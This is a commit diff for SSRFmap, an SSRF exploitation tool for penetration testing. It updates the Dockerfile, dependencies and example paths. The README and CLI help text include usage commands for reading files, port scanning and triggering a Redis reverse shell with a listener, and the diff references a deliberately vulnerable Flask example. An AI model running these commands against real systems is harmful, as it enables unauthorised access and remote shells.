Dockerfile reworked + examples

.gitignore

@@ -104,3 +104,6 @@ venv.bak/
 
 # mypy
 .mypy_cache/
+
+# artifacts
+127.0.0.1_5000/

Dockerfile

@@ -1,9 +1,14 @@
-FROM python:3-alpine3.10
+FROM python:3.12.4-alpine
 
-WORKDIR /opt
+WORKDIR /usr/src/app
+COPY . /usr/src/app
 
-RUN apk update && apk add git
+RUN apk update && apk add curl
-RUN git clone https://github.com/swisskyrepo/SSRFmap.git
-RUN cd /opt/SSRFmap && pip install -r requirements.txt
 
-ENTRYPOINT ["python3","/opt/SSRFmap/ssrfmap.py"]
+# Install requirements
+RUN pip install -r requirements.txt
+
+# Downgrade privileges
+USER 1000
+
+ENTRYPOINT ["python3"]

README.md

@@ -45,13 +45,12 @@ The following modules are already implemented and can be used with the `-m` argu
 
 ## Install and Manual
 
-Basic install from the Github repository.
+* From the Github repository.
-
+  ```powershell
-```powershell
+  $ git clone https://github.com/swisskyrepo/SSRFmap
-$ git clone https://github.com/swisskyrepo/SSRFmap
+  $ cd SSRFmap/
-$ cd SSRFmap/
+  $ pip3 install -r requirements.txt
-$ pip3 install -r requirements.txt
+  $ python3 ssrfmap.py
-$ python3 ssrfmap.py
 
     usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
                       [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
@@ -70,12 +69,21 @@ $ python3 ssrfmap.py
       --ssl [SSL]         Use HTTPS without verification
       --proxy PROXY       Use HTTP(s) proxy (ex: http://localhost:8080)
       --level [LEVEL]     Level of test to perform (1-5, default: 1)
-```
+  ```
+
+* Docker
+  ```powershell
+  $ git clone https://github.com/swisskyrepo/SSRFmap
+  $ docker build --no-cache -t ssrfmap .
+  $ docker run -it ssrfmap ssrfmap.py [OPTIONS] 
+  $ docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py
+  ```
+
 
 ## Examples
 
 First you need a request with a parameter to fuzz, Burp requests works well with SSRFmap. 
-They should look like the following. More examples are available in the **/data** folder.
+They should look like the following. More examples are available in the **./examples** folder.
 
 ```powershell
 POST /ssrf HTTP/1.1
@@ -97,21 +105,21 @@ Use the `-m` followed by module name (separated by a `,` if you want to launch s
 
 ```powershell
 # Launch a portscan on localhost and read default files
-python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
+python ssrfmap.py -r examples/request.txt -p url -m readfiles,portscan
 ```
 
 If you need to have a custom user-agent use the `--uagent`. Some targets will use HTTPS, you can enable it with `--ssl`.
 
 ```powershell
 # Launch a portscan against an HTTPS endpoint using a custom user-agent
-python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
+python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
 ```
 
 Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell.
 
 ```powershell
 # Triggering a reverse shell on a Redis
-python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
+python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
 
 # -l create a listener for reverse shell on the specified port
 # --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
@@ -127,10 +135,19 @@ When the target is protected by a WAF or some filters you can try a wide range o
 
 A quick way to test the framework can be done with `data/example.py` SSRF service.
 
-```powershell
+* Local
-FLASK_APP=data/example.py flask run &
+  ```powershell
-python ssrfmap.py -r data/request.txt -p url -m readfiles
+  FLASK_APP=examples/example.py flask run &
-```
+  python ssrfmap.py -r examples/request.txt -p url -m readfiles
+  ```
+
+* Docker
+  ```ps1
+  docker build --no-cache -t ssrfmap .
+  docker run -it -v $(pwd):/usr/src/app --name example ssrfmap examples/example.py
+  docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles
+  ```
+
 
 ## Contribute
 

examples/example.py

@@ -1,9 +1,8 @@
-# NOTE: do not try this at home - highly vulnerable ! (SSRF and RCE)
+# NOTE: Do not try this at home - highly vulnerable ! (SSRF and RCE)
-# NOTE: this file should become a simple ssrf example in order to test SSRFmap
+# NOTE: SSRF examples script
 # FLASK_APP=example.py flask run
 
-from flask import Flask, abort, request 
+from flask import Flask, request 
-import json
 import re
 import subprocess
 

requirements.txt

@@ -1,2 +1,2 @@
-Flask==2.3.2
+Flask==3.0.3
-requests==2.21.0
+requests==2.31.0

ssrfmap.py

@@ -17,11 +17,11 @@ def display_banner():
 
 def parse_args():
     example_text = '''Examples:
-    python ssrfmap.py -r data/request2.txt -p url -m portscan
+    python ssrfmap.py -r examples/request2.txt -p url -m portscan
-    python ssrfmap.py -r data/request.txt -p url -m redis
+    python ssrfmap.py -r examples/request.txt -p url -m redis
-    python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
+    python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
-    python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
+    python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
-    python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles 
+    python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles 
     '''
     parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
     parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")